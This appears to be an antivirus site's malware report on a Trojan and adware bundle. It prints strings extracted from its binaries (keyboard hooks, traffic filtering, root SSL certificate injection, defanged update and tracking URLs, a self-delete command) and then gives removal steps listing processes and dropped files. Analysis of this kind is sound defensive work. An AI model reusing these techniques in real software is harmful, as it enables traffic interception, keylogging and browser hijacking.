comodoice.exe
srwareiron.exe
srware.exe
coolnovo.exe
cool.exe
qup.exe
browseme.exe
swiftfox.exe
omniweb.exe
omni.exe
spark.exe
bobrowser.exe
crossbrowser.exe
crossbrowse.exe
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start ActSys
cmd.exe /c net stop ActSys
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

ProtectService.exe_3496:

.text
`.rdata
@.data
.rsrc
@.reloc
GET %s%s%s HTTP/1.1
Host: %s
%sUser-Agent: Mozilla/4.0
POST %s HTTP/1.1
%sContent-Type: %s
User-Agent: Mozilla/4.0
Content-Length: %u
%*s %d %*s
%*[ ]%[^
?456789:;<=
!"#$%&'()* ,-./0123
file_url
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
MSVCP110.dll
InternetCrackUrlW
WININET.dll
WS2_32.dll
SHLWAPI.dll
MSVCR110.dll
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
_calloc_crt
__crtGetShowWindowMode
_amsg_exit
_wcmdln
__crtSetUnhandledExceptionFilter
WinHttpCloseHandle
WinHttpOpen
WinHttpSetTimeouts
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WINHTTP.dll
SensApi.dll
VERSION.dll
PSAPI.DLL
USERENV.dll
.?AVCHttpClient@@
.?AVCTcpipSocket@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
2-2v2
hXXp://
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=
WinHttpClient
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
hXXp://xa.xingcloud.com
xxxx
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
UpDateProcess.exe
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Report HeartBeat
cmdshell.exe
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
explorer.exe
Advapi32.dll
"%s" %s
psapi.dll
Explorer.exe
json_value.cpp
ljson_reader.cpp
ProtectSvc.exe
4.0.1.2105

HPNotify.exe_3664:

.text
`.rdata
@.data
.rsrc
@.reloc
<9%uo
wszUrl
strUrlTemp
hKEY
strSelUrl
strUrl
strConfUrlTemp
strDsUrl
strHpUrl
strCmdLine
tCPW
%UUUU
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentDsUrl
URLDownloadToFileW
URLDownloadToFileW ret:0XX
Error : %d
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.1.3
monochrome
unsupported bit depth
`'\%D,3
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%s%s
RegOpenKeyExW
RegCloseKey
del /s/q %1\*.*
%suninstall.bat
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
KERNEL32.dll
GetKeyState
USER32.dll
GDI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteA
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHDeleteKeyW
SHLWAPI.dll
MSVCP110.dll
MSVCR110.dll
_calloc_crt
_CRT_RTC_INITW
__crtGetShowWindowMode
_amsg_exit
_wcmdln
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
GdiplusShutdown
gdiplus.dll
IMM32.dll
DeleteUrlCacheEntryW
WININET.dll
COMCTL32.dll
GetProcessHeap
#*1892 $
%,3:;4-&
.?AVCActiveXEnum@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
hXXp://VVV.bing.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.google.com/
%sconf
web/?type=dspp&
web/?type=dspp
hXXp://VVV.v9.com/
Itemd
BrowserAction.dll
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
\\.\Scsi%d:
UrlEdit
conf.xml
hXXp://v9.com/license_agreement.html
hXXp://v9.com/privacy_policy.html
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
%stmp%d.tmp
urlmon.dll
main.xml
explorer.exe
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
IeWatchDog.dll
BrowerWatchFF.dll
BrowerWatchCH.dll
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
Amsimg32.dll
User32.dll
WM_KEYDOWN
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYUP
0xX
keyboard
Bmsftedit.dll
password
%s%s%s
Correct password required
%s\%s
WebBrowser
transshadow
transshadow1
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
M-d-d
WebBrowserUI
errorUrl
E{D27CDB6E-AE6D-11CF-96B8-444553540000}
user32.dll
MSPDB110.DLL
ADVAPI32.DLL
/c ping 127.0.0.1 -n 2 > nul && del /s/q
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SupHPNot.exe
4,0,1,1716
SupHPNty.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392
    net1.exe:976
    net1.exe:2596
    net1.exe:2220
    net1.exe:2588
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196
    310714_is.tmp:1388
    ProtectService.exe:3496
    ProtectService.exe:3676
    ProtectService.exe:3468
    XTab_Setup2121.exe:3372
    wpm_v20.0.0.1953_0302.exe:3104
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248
    net.exe:2552
    net.exe:1808
    net.exe:2556
    net.exe:400
    QQBrowser.exe:2908
    QQBrowser.exe:2216
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660
    HPNotify.exe:3664
    ActSys.exe:2440
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628
    cmdshell.exe:3548
    amisetup5755__9664.exe:1532
    nfregdrv.exe:976
    nfregdrv.exe:1540
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452
    CashReminder.exe:596
    sc.exe:3420
    sc.exe:3396
    GOSafer.exe:2464
    GOSafer.exe:2604
    WNet.exe:256
    310714_is.exe:1880
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
    %Program Files%\ActSys\ActSys.exe (15536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (66 bytes)
    %Program Files%\ActSys\asfilterdrv.sys (1856 bytes)
    %System%\drivers\asfilterdrv.sys (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
    %Program Files%\ActSys\remove_ActSys.exe (825 bytes)
    %Program Files%\ActSys\ssleay32.dll (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
    %Program Files%\ActSys\nfapi.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (780 bytes)
    %Program Files%\ActSys\libeay32.dll (35507 bytes)
    %Program Files%\ActSys\nfregdrv.exe (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv13.tmp (130190 bytes)
    %Program Files%\ActSys\ProtocolFilters.dll (35001 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (4136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (3185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (3039 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\MobiMidia_validation[1].js (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\verificar_ip[1].php (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310113f8[1].htm (707 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\i[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\010914i[1].htm (734 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\icone_cadeado[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\carregando[1].gif (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp\nsWeb.dll (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\310113f8[1].htm (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\010914i[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\mt-core[1].js (55269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\top-line[1].gif (1 bytes)
    %Program Files%\XTab\web\_locales\es-ES\messages.json (3 bytes)
    %Program Files%\XTab\web\_locales\pt\messages.json (4 bytes)
    %Program Files%\XTab\searchProvider.xml (8 bytes)
    %Program Files%\XTab\web\_locales\zh-CN\messages.json (3 bytes)
    %Program Files%\XTab\web\_locales\fr-BE\messages.json (3 bytes)
    %Program Files%\XTab\web\_locales\pl\messages.json (3 bytes)
    %Program Files%\XTab\web\ver.txt (47 bytes)
    %Program Files%\XTab\web\img\icon128.png (9 bytes)
    %Program Files%\XTab\web\_locales\vi-VI\messages.json (4 bytes)
    %Program Files%\XTab\web\_locales\es-419\messages.json (3 bytes)
    %Program Files%\XTab\skin\input_bk.png (2 bytes)
    %Program Files%\XTab\web\_locales\ru\messages.json (4 bytes)
    %Program Files%\XTab\CmdShell.exe (1685 bytes)
    %Program Files%\XTab\BrowerWatchCH.dll (23 bytes)
    %Program Files%\XTab\web\_locales\fr-FR\messages.json (3 bytes)
    %Program Files%\XTab\skin\logo.png (5 bytes)
    %Program Files%\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
    %Program Files%\XTab\web\_locales\zh-TW\messages.json (3 bytes)
    %Program Files%\XTab\web\_locales\en-US\messages.json (3 bytes)
    %Program Files%\XTab\web\_locales\fr-LU\messages.json (3 bytes)
    %Program Files%\XTab\web\js\common.js (2 bytes)
    %Program Files%\XTab\web\_locales\it-IT\messages.json (4 bytes)
    %Program Files%\XTab\skin\conf.xml (8 bytes)
    %Program Files%\XTab\skin\btn.png (2 bytes)
    %Program Files%\XTab\skin\conf_back.png (1623 bytes)
    %Program Files%\XTab\web\js\library.js (4216 bytes)
    %Program Files%\XTab\web\_locales\tr-TR\messages.json (4 bytes)
    %Program Files%\XTab\install.data (93 bytes)
    %Program Files%\XTab\skin\rigth_arrow.png (2 bytes)
    %Program Files%\XTab\uninstall.exe (1343 bytes)
    %Program Files%\XTab\web\img\google_trends.png (7 bytes)
    %Program Files%\XTab\web\data.html (20 bytes)
    %Program Files%\XTab\IeWatchDog.dll (20 bytes)
    %Program Files%\XTab\skin\radio_2.png (3 bytes)
    %Program Files%\XTab\web\js\ga.js (1568 bytes)
    %Program Files%\XTab\ffsearch_toolbar!1.0.0.1028.xpi (15 bytes)
    %Program Files%\XTab\web\js\jquery.autocomplete.js (12 bytes)
    %Program Files%\XTab\web\js\xagainit2.0.js (4 bytes)
    %Program Files%\XTab\web\_locales\pt-BR\messages.json (4 bytes)
    %Program Files%\XTab\web\_locales\it-CH\messages.json (3 bytes)
    %Program Files%\XTab\skin\radio_1.png (3 bytes)
    %Program Files%\XTab\msvcp110.dll (16990 bytes)
    %Program Files%\XTab\web\_locales\fr-CA\messages.json (3 bytes)
    %Program Files%\XTab\web\indexIE.html (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (11 bytes)
    %Program Files%\XTab\web\indexIE8.html (1794 bytes)
    %Program Files%\XTab\web\_locales\ru-MO\messages.json (4 bytes)
    %Program Files%\XTab\web\img\icon48.png (3 bytes)
    %Program Files%\XTab\skin\close.png (3 bytes)
    %Program Files%\XTab\skin\about.png (4 bytes)
    %Program Files%\XTab\web\js\js.js (18 bytes)
    %Program Files%\XTab\skin\settings.png (5 bytes)
    %Program Files%\XTab\web\img\icon16.png (628 bytes)
    %Program Files%\XTab\skin\about_bk.png (1436 bytes)
    %Program Files%\XTab\SupTab.dll (15406 bytes)
    %Program Files%\XTab\web\js\xagainit-ie8.js (4 bytes)
    %Program Files%\XTab\msvcr110.dll (21280 bytes)
    %Program Files%\XTab\ProtectService.exe (5309 bytes)
    %Program Files%\XTab\skin\main.xml (4 bytes)
    %Program Files%\XTab\web\main.css (19 bytes)
    %Program Files%\XTab\HPNotify.exe (17941 bytes)
    %Program Files%\XTab\conf (1694 bytes)
    %Program Files%\XTab\web\img\loading.gif (5 bytes)
    %Program Files%\XTab\skin\btn_apply.png (6 bytes)
    %Program Files%\XTab\web\img\logo32.ico (4 bytes)
    %Program Files%\XTab\BrowserAction.dll (33992 bytes)
    %Program Files%\XTab\web\_locales\fr-CH\messages.json (3 bytes)
    %Program Files%\XTab\BrowerWatchFF.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (1856 bytes)
    %Program Files%\GOSafer\nfregdrv.exe (1552 bytes)
    %Program Files%\GOSafer\gosafer.exe (15536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg17.tmp (66910 bytes)
    %System%\drivers\gosaferdrv.sys (55 bytes)
    %Program Files%\GOSafer\uninst.exe (1793 bytes)
    %Program Files%\GOSafer\ProtocolFilters.dll (9320 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (5 bytes)
    %Program Files%\GOSafer\libeay32.dll (35507 bytes)
    %Program Files%\GOSafer\ssleay32.dll (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (11 bytes)
    %Program Files%\GOSafer\nfapi.dll (4992 bytes)
    %Program Files%\GOSafer\gosaferdrv.sys (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (3566 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (17629 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (190 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WebDataJs (40 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\bg1.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\Thumbs.db (27 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe (14022 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\uninstallDlg2.xml (15 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code1.jpg (5 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_light.png (139 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code4.jpg (5 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\479.json (512 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (993 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code5.jpg (4 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code3.jpg (5 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\bk_shadow.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\Thumbs.db (42 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\MessageBox.xml (3 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\button1.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_bg.png (159 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\scrollbar.bmp (37 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\checked.png (222 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox_select.png (783 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\unchecked.png (135 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code6.jpg (5 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\close.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code2.jpg (4 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\min.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox.png (545 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\button.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\bg.png (673 bytes)
    %Program Files%\CashReminder\ssleay32.dll (12088 bytes)
    %Program Files%\CashReminder\nfapi.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (11 bytes)
    %System%\drivers\crfilterdrv.sys (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (67341 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (1856 bytes)
    %Program Files%\CashReminder\libeay32.dll (35507 bytes)
    %Program Files%\CashReminder\uninstall.exe (1568 bytes)
    %Program Files%\CashReminder\nfregdrv.exe (1552 bytes)
    %Program Files%\CashReminder\CashReminder.exe (15536 bytes)
    %Program Files%\CashReminder\crfilterdrv.sys (1856 bytes)
    %Program Files%\CashReminder\ProtocolFilters.dll (9320 bytes)
    %WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.cer (782 bytes)
    %WinDir%\Temp\P_RuleList.txt (180 bytes)
    %WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.pvk (1 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\rules[1].txt (180 bytes)
    %Program Files%\WNet\nfregdrv.exe (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (5 bytes)
    %Program Files%\WNet\WNet.exe (15168 bytes)
    %Program Files%\WNet\uninst.exe (1720 bytes)
    %Program Files%\WNet\ssleay32.dll (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsyF.tmp (68079 bytes)
    %System%\drivers\ssfilterdrv.sys (55 bytes)
    %Program Files%\WNet\ProtocolFilters.dll (9320 bytes)
    %Program Files%\WNet\nfapi.dll (4992 bytes)
    %Program Files%\WNet\libeay32.dll (35507 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (11 bytes)
    %Program Files%\WNet\ssfilterdrv.sys (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (107 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\index[1].htm (2203 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\amipb[1].js (34728 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (27 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe (64683 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe (20504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1] (64392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\nsWeb.dll (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1] (64683 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe (64683 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe (33816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe (110758 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1] (44832 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe (20504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe (32816 bytes)
